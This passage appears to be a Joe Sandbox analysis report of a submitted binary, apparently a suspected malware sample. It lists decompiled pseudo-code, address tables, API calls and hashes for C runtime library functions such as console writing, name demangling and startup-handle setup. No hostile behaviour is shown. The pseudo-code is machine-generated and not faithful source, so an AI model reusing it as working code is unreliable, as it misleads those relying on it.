									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x456b18 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x456b18 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x456b18 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E0042E625( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E0042E625();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E004085C2(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}

0x0043e995
0x0043e99c
0x0043e99f
0x0043e9a4
0x0043e9ac
0x0043e9af
0x0043e9b3
0x0043e9b6
0x0043e9c0
0x0043e9ca
0x0043e9cc
0x0043e9cf
0x0043e9d2
0x0043e9d8
0x0043e9da
0x0043e9e1
0x0043e9ee
0x0043e9ef
0x0043e9f2
0x0043e9f5
0x0043e9f6
0x0043e9f7
0x0043e9fa
0x0043e9ff
0x0043ed0b
0x0043ed0b
0x0043ea05
0x0043ea05
0x0043ea08
0x0043ea0a
0x0043ea10
0x0043ea13
0x0043ea1a
0x0043ea21
0x0043ea2a
0x00000000
0x00000000
0x0043ea30
0x0043ea36
0x0043ea38
0x0043ea3a
0x0043ea3d
0x0043ea42
0x0043ea46
0x00000000
0x00000000
0x00000000
0x0043ea46
0x0043ea4b
0x0043ea4e
0x0043ea50
0x0043ea55
0x0043eb07
0x0043eb08
0x0043eb0b
0x0043eb0d
0x0043ecbb
0x0043ecbd
0x00000000
0x0043ecbf
0x0043ecbf
0x0043ecc2
0x0043ecc5
0x0043ecce
0x0043ecd1
0x0043ecd2
0x0043ecd6
0x0043ecd9
0x0043ecd9
0x00000000
0x0043ecdd
0x0043eb13
0x0043eb13
0x0043eb18
0x0043eb1b
0x0043eb21
0x0043eb27
0x0043eb30
0x0043eb33
0x0043eb33
0x0043eb34
0x0043eb35
0x0043eb38
0x0043eb39
0x00000000
0x0043eb39
0x0043ea5b
0x0043ea6a
0x0043ea6b
0x0043ea6e
0x0043ea70
0x0043ea75
0x0043ec86
0x0043ec88
0x0043ec8a
0x0043ec8d
0x0043ec92
0x0043ec9b
0x0043ec9e
0x0043ec9f
0x0043eca3
0x0043eca6
0x0043eca9
0x0043eca9
0x0043ecad
0x0043ecad
0x0043ecad
0x0043ecb0
0x0043ecb0
0x0043ecb0
0x0043ecb2
0x0043ecb2
0x0043ecb6
0x0043ea7b
0x0043ea7b
0x0043ea7f
0x0043ea81
0x0043ea84
0x0043ea87
0x0043ea8b
0x0043ea8c
0x0043ea90
0x0043ea90
0x0043ea93
0x0043ea98
0x0043eaa4
0x0043eaa9
0x0043eaac
0x0043eaac
0x0043eab1
0x0043eab3
0x0043eab6
0x0043eab8
0x0043eabb
0x0043eabe
0x0043eac1
0x0043eac9
0x0043eacd
0x0043ead1
0x0043ead1
0x0043ead7
0x0043eadd
0x0043eae0
0x0043eae8
0x0043eaef
0x0043eaf3
0x0043eaf4
0x0043eaf7
0x0043eaf8
0x0043eb3c
0x0043eb3c
0x0043eb40
0x0043eb41
0x0043eb46
0x0043eb4c
0x00000000
0x0043eb52
0x0043eb56
0x0043ebdf
0x0043ebe6
0x0043ebee
0x0043ebf6
0x0043ebfb
0x0043ebfe
0x0043ec03
0x00000000
0x0043ec09
0x0043ec1e
0x0043ed02
0x0043ed08
0x00000000
0x0043ec24
0x0043ec2d
0x0043ec2f
0x0043ec35
0x00000000
0x0043ec3b
0x0043ec3f
0x0043ec75
0x0043ec78
0x00000000
0x0043ec7e
0x0043ec7e
0x00000000
0x0043ec7e
0x0043ec41
0x0043ec43
0x0043ec45
0x0043ec5e
0x00000000
0x0043ec64
0x0043ec68
0x00000000
0x0043ec6e
0x0043ec6e
0x0043ec71
0x0043ec72
0x00000000
0x0043ec72
0x0043ec68
0x0043ec5e
0x0043ec3f
0x0043ec35
0x0043ec1e
0x0043ec03
0x0043eb4c
0x0043ea75
0x00000000
0x0043eb5d
0x0043eb5d
0x0043eb60
0x0043eb64
0x0043eb67
0x0043eb89
0x0043eb8c
0x0043eb91
0x0043eb95
0x0043eb99
0x0043ebc7
0x0043ebc9
0x00000000
0x0043eb9b
0x0043eb9b
0x0043eb9e
0x0043eba1
0x0043eba4
0x0043ecdf
0x0043ece2
0x0043ece5
0x0043ecef
0x0043ecfa
0x0043ecff
0x00000000
0x0043ebaa
0x0043ebb1
0x0043ebb6
0x0043ebb9
0x0043ebbc
0x00000000
0x0043ebc2
0x0043ebc2
0x00000000
0x0043ebc2
0x0043ebbc
0x0043eba4
0x0043eb69
0x0043eb6d
0x0043eb70
0x0043eb75
0x0043eb7b
0x0043eb7d
0x0043eb84
0x0043ebca
0x0043ebcd
0x0043ebce
0x0043ebd3
0x0043ebd6
0x0043ebd9
0x00000000
0x00000000
0x00000000
0x00000000
0x0043ebd9
0x00000000
0x0043eb67
0x0043ea08
0x0043ed0e
0x0043ed0e
0x0043ed10
0x0043ed13
0x0043ed13
0x0043ed13
0x0043ed13
0x0043ed25
0x0043ed27
0x0043ed28
0x0043ed29
0x0043ed33

APIs

GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 0043E9D2
__fassign.LIBCMT ref: 0043EBB1
__fassign.LIBCMT ref: 0043EBCE
WriteFile.KERNEL32(?,0043777F,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043EC16
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0043EC56
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043ED02

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 3807097578fd6cb51cb62daa7601a408cfdb1f3d5b9bf3fa28ed712c7849fb55
Instruction ID: 522681eab19f6d8bc02efa05d8cae34b1ee4e91d0e11246fe13f7abf6de0e4e8
Opcode Fuzzy Hash: 3807097578fd6cb51cb62daa7601a408cfdb1f3d5b9bf3fa28ed712c7849fb55
Instruction Fuzzy Hash: 79D19E71D012599FCF15CFA9D8809EDBBB5BF48314F28116AE415BB382D634AD42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00410D08 Relevance: 9.1, APIs: 6, Instructions: 119
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00410D08(intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				char* _t29;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					_t29 =  *0x456018; // 0x0
					if( *_t29 == 0) {
						E0040AEC8(E0040AAF4( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E0040D4FF( &_v12);
						_t65 = E0040AEC8(E0040AEEA( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x456018; // 0x0
							if( *_t39 == 0x40) {
								L19:
								 *0x456018 = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E0040AF6A(_t75,  &_v12);
									_t39 =  *0x456018; // 0x0
									while(1) {
										_t67 =  *((intOrPtr*)(_t75 + 4));
										if(_t67 > 1) {
											break;
										}
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E0040B0D2(_t75, 1);
											}
											E0040B019(_t75, 0x7d);
											_t39 =  *0x456018; // 0x0
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = E0040AE59(_t67,  &_v20, 0x60, E0040F5BA(_t73,  &_v28));
												_t78 = _t78 + 0x10;
												E0040AFC2(_t75, E0040AEEA(_t48,  &_v36, 0x27));
												_t39 =  *0x456018; // 0x0
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x456018 = _t39;
												}
												if( *((intOrPtr*)(_t75 + 4)) > 1 ||  *_t39 == 0x40) {
													continue;
												} else {
													_v12 = "s ";
													_v8 = 2;
													goto L5;
												}
												goto L21;
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}

0x00410d0b
0x00410d0e
0x00410d15
0x00410d1b
0x00410d1d
0x00410d20
0x00410d25
0x00410d2b
0x00410d33
0x00410e46
0x00410e4e
0x00410e53
0x00410d39
0x00410d3d
0x00410d5d
0x00410d61
0x00410d63
0x00410d66
0x00410d6b
0x00410d71
0x00410d79
0x00410e2e
0x00410e2f
0x00410d7f
0x00410d7f
0x00410d86
0x00410d8d
0x00410d8d
0x00410d93
0x00410d98
0x00410d9d
0x00410d9d
0x00410da2
0x00000000
0x00000000
0x00410da8
0x00410dac
0x00410e0e
0x00410e11
0x00410e16
0x00410e16
0x00410e1f
0x00410e24
0x00410dae
0x00410db1
0x00410e0c
0x00000000
0x00000000
0x00410db3
0x00410dc3
0x00410dc8
0x00410ddb
0x00410de0
0x00410de8
0x00410dea
0x00410deb
0x00410deb
0x00410df3
0x00000000
0x00410dfa
0x00410dfa
0x00410e01
0x00000000
0x00410e01
0x00000000
0x00410df3
0x00410db1
0x00000000
0x00410dac
0x00410e2c
0x00000000
0x00000000
0x00000000
0x00410e2c
0x00410d8d
0x00410d79
0x00410d6b
0x00410d33
0x00410e56
0x00410e5b

APIs

DName::operator+.LIBCMT ref: 00410D4C
DName::operator+.LIBCMT ref: 00410D58

Part of subcall function 0040AF6A: shared_ptr.LIBCMT ref: 0040AF86

DName::operator+=.LIBCMT ref: 00410E16

Part of subcall function 0040F5BA: DName::operator+.LIBCMT ref: 0040F625
Part of subcall function 0040F5BA: DName::operator+.LIBCMT ref: 0040F8EF

Part of subcall function 0040AE59: DName::operator+.LIBCMT ref: 0040AE7A

DName::operator+.LIBCMT ref: 00410DD3

Part of subcall function 0040AFC2: DName::operator=.LIBVCRUNTIME ref: 0040AFE3

DName::DName.LIBVCRUNTIME ref: 00410E3A
DName::operator+.LIBCMT ref: 00410E46

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: ff83d05f093e18f6fce170f6fba1f90207047e0c253c01744282dd325e49655a
Instruction ID: 3a3e9b68502d82329006e94d220223db3dcfef748285a70a9895672169d0f238
Opcode Fuzzy Hash: ff83d05f093e18f6fce170f6fba1f90207047e0c253c01744282dd325e49655a
Instruction Fuzzy Hash: B241C4B0A00304AFDB24DFA5D851BEF7BE5AB09700F44486EE145A72C1D778A9C4CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F978 Relevance: 9.1, APIs: 6, Instructions: 94
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040F978(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				void* __edi;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t58;
				intOrPtr* _t60;

				_t60 = _a4;
				 *_t60 = 0;
				 *((intOrPtr*)(_t60 + 4)) = 0;
				_t25 = E00410E5C(__edx, 0,  &_v12, 1, 0);
				_t40 =  *_t25;
				_t58 = _t40;
				 *_t60 = _t40;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t60 + 4)) = _t26;
				_t27 =  *0x456018; // 0x0
				if(_t26 == 0) {
					_t39 =  *_t27;
					if(_t39 != 0 && _t39 != 0x40) {
						_v12 = "::";
						_v8 = 2;
						_t37 = E0040AEC8(E0040AEA6(E0040F5BA(_t58,  &_v20),  &_v28,  &_v12),  &_v36, _t60);
						_t58 =  *_t37;
						 *_t60 = _t58;
						 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t27 =  *0x456018; // 0x0
					}
				}
				_t41 =  *_t27;
				if(_t41 != 0x40) {
					if(_t41 == 0) {
						_push(1);
						if(_t58 != 0) {
							_v12 = "::";
							_v8 = 2;
							_t30 = E0040AEC8(E0040AEA6(E0040AAF4( &_v36),  &_v28,  &_v12),  &_v20, _t60);
							 *_t60 =  *_t30;
							 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							E0040ADC2(_t60);
						}
					} else {
						 *((intOrPtr*)(_t60 + 4)) = 0;
						 *((char*)(_t60 + 4)) = 2;
						 *_t60 = 0;
					}
				} else {
					 *0x456018 = _t27 + 1;
				}
				return _t60;
			}

0x0040f983
0x0040f98d
0x0040f98f
0x0040f992
0x0040f99a
0x0040f99c
0x0040f99e
0x0040f9a0
0x0040f9a5
0x0040f9a8
0x0040f9ad
0x0040f9af
0x0040f9b3
0x0040f9bd
0x0040f9c5
0x0040f9e8
0x0040f9ed
0x0040f9ef
0x0040f9f4
0x0040f9f7
0x0040f9f7
0x0040f9b3
0x0040f9fc
0x0040fa01
0x0040fa0d
0x0040fa1a
0x0040fa1e
0x0040fa2c
0x0040fa33
0x0040fa55
0x0040fa5c
0x0040fa61
0x0040fa20
0x0040fa22
0x0040fa22
0x0040fa0f
0x0040fa0f
0x0040fa12
0x0040fa16
0x0040fa16
0x0040fa03
0x0040fa04
0x0040fa04
0x0040fa6a

APIs

Part of subcall function 00410E5C: Replicator::operator[].LIBCMT ref: 00410E99

DName::operator=.LIBVCRUNTIME ref: 0040FA22

Part of subcall function 0040F5BA: DName::operator+.LIBCMT ref: 0040F625
Part of subcall function 0040F5BA: DName::operator+.LIBCMT ref: 0040F8EF

DName::operator+.LIBCMT ref: 0040F9DC
DName::operator+.LIBCMT ref: 0040F9E8
DName::DName.LIBVCRUNTIME ref: 0040FA3A
DName::operator+.LIBCMT ref: 0040FA49
DName::operator+.LIBCMT ref: 0040FA55

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 7178672daa4aef573371b4e7efe21c5c91b288f8dc8a0f56b2b3fa8e4d2bef44
Instruction ID: e045678310db7cd070bd83677dbd190bc99c518cee7974afa1d0b354a2a71c07
Opcode Fuzzy Hash: 7178672daa4aef573371b4e7efe21c5c91b288f8dc8a0f56b2b3fa8e4d2bef44
Instruction Fuzzy Hash: 1E31A6B1A003049FCB24DF95D451AEBBBF4AF59304F14847EE58AA77C1D7389A48CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A32F Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0040A32F(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x454270 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E004119D7(_t13,  *0x454270);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00411A12(_t14,  *0x454270, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0042BA1A();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00411A12(_t18,  *0x454270, 0);
								} else {
									_t8 = E00411A12(_t18,  *0x454270, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00413B60(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x0040a32f
0x0040a336
0x0040a349
0x0040a350
0x0040a352
0x0040a356
0x0040a36f
0x0040a36f
0x0040a358
0x0040a35a
0x0040a36d
0x0040a374
0x0040a37d
0x0040a380
0x0040a383
0x0040a397
0x0040a397
0x0040a3a0
0x0040a385
0x0040a38c
0x0040a392
0x0040a395
0x0040a3a9
0x0040a3ab
0x00000000
0x00000000
0x00000000
0x0040a395
0x0040a3ae
0x00000000
0x00000000
0x00000000
0x0040a36d
0x0040a35a
0x0040a3b6
0x0040a3c0
0x0040a338
0x0040a33a
0x0040a33a

APIs

GetLastError.KERNEL32(?,?,0040A326,00409F43,00408180), ref: 0040A33D
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A34B
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A364
SetLastError.KERNEL32(00000000,0040A326,00409F43,00408180), ref: 0040A3B6

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 45b8d5632a034f41bf281631027dc4fa241e2100596d9ecc4159ea61f69cdb9a
Instruction ID: 7ed36fd8fb6f5cae0230e01a5f8f9685c4b24c0e8fbbc4c2e4feb6c49f2e25f5
Opcode Fuzzy Hash: 45b8d5632a034f41bf281631027dc4fa241e2100596d9ecc4159ea61f69cdb9a
Instruction Fuzzy Hash: 1C01D8722193215EEB141776BC4596B2A54EB417BDB20033FFA20651F1FF398C96A14E

Uniqueness

Uniqueness Score: -1.00%

Function 00406170 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406170(unsigned int _a4, signed int _a8) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v30;
				char _v320;
				char* _t121;

				_v8 =  &_v320;
				if(_a4 != 0) {
					if(_a4 >> 0x10 != 0) {
						if(IsBadStringPtrW(_a4, _a8) == 0) {
							if(_a8 != 0xffffffff) {
								L11:
								 *_v8 = 0x4c;
								_v8 = _v8 + 1;
								 *_v8 = 0x22;
								_v8 = _v8 + 1;
								while(1) {
									_v20 = _a8;
									_a8 = _a8 - 1;
									if(_v20 <= 0 || _v8 >  &_v30) {
										break;
									}
									_v12 =  *_a4;
									_a4 = _a4 + 2;
									_v16 = _v12 & 0x0000ffff;
									_v16 = _v16 - 9;
									if(_v16 > 0x53) {
										L21:
										if((_v12 & 0x0000ffff) < 0x20 || (_v12 & 0x0000ffff) >= 0x7f) {
											 *_v8 = 0x5c;
											_v8 = _v8 + 1;
											_t79 = ((_v12 & 0x0000ffff) >> 0x0000000c & 0x0000000f) + "0123456789abcdef"; // 0x33323130
											 *_v8 =  *_t79;
											_v8 = _v8 + 1;
											_t84 = ((_v12 & 0x0000ffff) >> 0x00000008 & 0x0000000f) + "0123456789abcdef"; // 0x33323130
											 *_v8 =  *_t84;
											_v8 = _v8 + 1;
											_t89 = ((_v12 & 0x0000ffff) >> 0x00000004 & 0x0000000f) + "0123456789abcdef"; // 0x33323130
											 *_v8 =  *_t89;
											_v8 = _v8 + 1;
											_t94 = (_v12 & 0xf) + "0123456789abcdef"; // 0x33323130
											 *_v8 =  *_t94;
											_v8 = _v8 + 1;
										} else {
											 *_v8 = _v12;
											_v8 = _v8 + 1;
										}
										L25:
										continue;
									}
									_t39 = _v16 + 0x406458; // 0xcccccc04
									switch( *((intOrPtr*)(( *_t39 & 0x000000ff) * 4 +  &M00406440))) {
										case 0:
											 *_v8 = 0x5c;
											_v8 = _v8 + 1;
											_v8 = _v8 + 1;
											 *_v8 = 0x74;
											_v8 = _v8 + 1;
											goto L25;
										case 1:
											 *_v8 = 0x5c;
											_v8 = _v8 + 1;
											 *_v8 = 0x6e;
											_v8 = _v8 + 1;
											goto L25;
										case 2:
											 *_v8 = 0x5c;
											_v8 = _v8 + 1;
											__eax = _v8;
											 *_v8 = 0x72;
											_v8 = _v8 + 1;
											goto L25;
										case 3:
											__eax = _v8;
											 *_v8 = 0x5c;
											_v8 = _v8 + 1;
											 *_v8 = 0x22;
											_v8 = _v8 + 1;
											_v8 = _v8 + 1;
											goto L25;
										case 4:
											 *_v8 = 0x5c;
											_v8 = _v8 + 1;
											__eax = _v8;
											 *_v8 = 0x5c;
											_v8 = _v8 + 1;
											goto L25;
										case 5:
											goto L21;
									}
								}
								 *_v8 = 0x22;
								_v8 = _v8 + 1;
								if(_a8 > 0) {
									 *_v8 = 0x2e;
									_v8 = _v8 + 1;
									 *_v8 = 0x2e;
									_v8 = _v8 + 1;
									 *_v8 = 0x2e;
									_v8 = _v8 + 1;
								}
								_t121 = _v8;
								 *_t121 = 0;
								0x400000( &_v320);
								return _t121;
							}
							_a8 = 0;
							while(( *(_a4 + _a8 * 2) & 0x0000ffff) != 0) {
								_a8 = _a8 + 1;
							}
							goto L11;
						}
						return "(invalid)";
					}
					return E00406040("#%04x", _a4 & 0xffff);
				}
				return "(null)";
			}

0x0040617f
0x00406186
0x0040619a
0x004061cb
0x004061db
0x004061ff
0x00406202
0x0040620b
0x00406211
0x0040621a
0x0040621d
0x00406220
0x00406229
0x00406230
0x00000000
0x00000000
0x00406248
0x00406252
0x00406259
0x00406262
0x00406269
0x0040632f
0x00406336
0x00406348
0x00406351
0x00406361
0x00406367
0x0040636f
0x0040637f
0x00406385
0x0040638d
0x0040639d
0x004063a3
0x004063ab
0x004063b8
0x004063be
0x004063c6
0x004063cb
0x004063d1
0x004063d9
0x004063d9
0x004063dc
0x00000000
0x004063dc
0x00406272
0x00406279
0x00000000
0x004062c9
0x004062cf
0x004062d2
0x004062d8
0x004062e1
0x00000000
0x00000000
0x00406283
0x0040628c
0x00406292
0x0040629b
0x00000000
0x00000000
0x004062a6
0x004062af
0x004062b2
0x004062b5
0x004062be
0x00000000
0x00000000
0x004062e9
0x004062ec
0x004062f5
0x004062fb
0x00406301
0x00406304
0x00000000
0x00000000
0x0040630f
0x00406318
0x0040631b
0x0040631e
0x00406327
0x00000000
0x00000000
0x00000000
0x00000000
0x00406279
0x004063e4
0x004063ed
0x004063f4
0x004063f9
0x00406402
0x00406408
0x00406411
0x00406417
0x00406420
0x00406420
0x00406423
0x00406426
0x00406430
0x00000000
0x00406435
0x004061dd
0x004061ef
0x004061ec
0x004061ec
0x00000000
0x004061ef
0x00000000
0x004061cd
0x00000000
0x004061b3
0x00000000

Strings

(null), xrefs: 00406188
#%04x, xrefs: 004061A9
(invalid), xrefs: 004061CD
S, xrefs: 00406265

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID: #%04x$(invalid)$(null)$S
API String ID: 0-2219028084
Opcode ID: 30aa4d0c409afe8921772b2a58468d3339f72bbfcf707f7853adf91ab08f036f
Instruction ID: 21e21edd15632ee7d462f62e6b32c2cc69c165c9e376d309407ab5186e83d47e
Opcode Fuzzy Hash: 30aa4d0c409afe8921772b2a58468d3339f72bbfcf707f7853adf91ab08f036f
Instruction Fuzzy Hash: 45A13B34905248EFCB05CF98C9506ADBBB1FF55305F2480DAE846AB382C739AF51EB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA0(signed char* _a4) {
				signed char* _v8;
				intOrPtr _v12;
				signed char _v16;
				signed char* _v20;
				signed int _v24;
				signed char _v28;
				struct _STARTUPINFOW _v96;
				signed char* _t63;
				signed char* _t83;

				_v96.cb = 0x44;
				GetStartupInfoW( &_v96);
				_a4[0x32] = _v96.cbReserved2;
				_t63 = _a4;
				_t63[0x34] = _v96.lpReserved2;
				if((_v96.cbReserved2 & 0x0000ffff) != 0 && _v96.lpReserved2 != 0) {
					_v12 =  *(_v96.lpReserved2);
					if((_v96.cbReserved2 & 0x0000ffff) >= 0x13) {
						_v24 = _v96.cbReserved2 & 0x0000ffff;
					} else {
						_v24 = 0x13;
					}
					_v28 = _v24;
					_v16 = E00405D60(_v24, _v28);
					_v8 = _v16 + 4;
					_v20 =  &(_v8[_v12]);
					E00408CA0(_v16, _v96.lpReserved2, _v96.cbReserved2 & 0x0000ffff);
					_a4[0x32] = _v28;
					_a4[0x34] = _v16;
					if(_v12 <= 0 || ( *_v8 & 0x00000001) != 0) {
						 *_v20 = GetStdHandle(0xfffffff6);
						 *_v8 =  *_v8 | 0x00000001;
					}
					if(_v12 <= 1 || (_v8[1] & 0x00000001) != 0) {
						_v20[4] = GetStdHandle(0xfffffff5);
						_v8[1] = _v8[1] | 0x00000001;
					}
					if(_v12 <= 2) {
						L13:
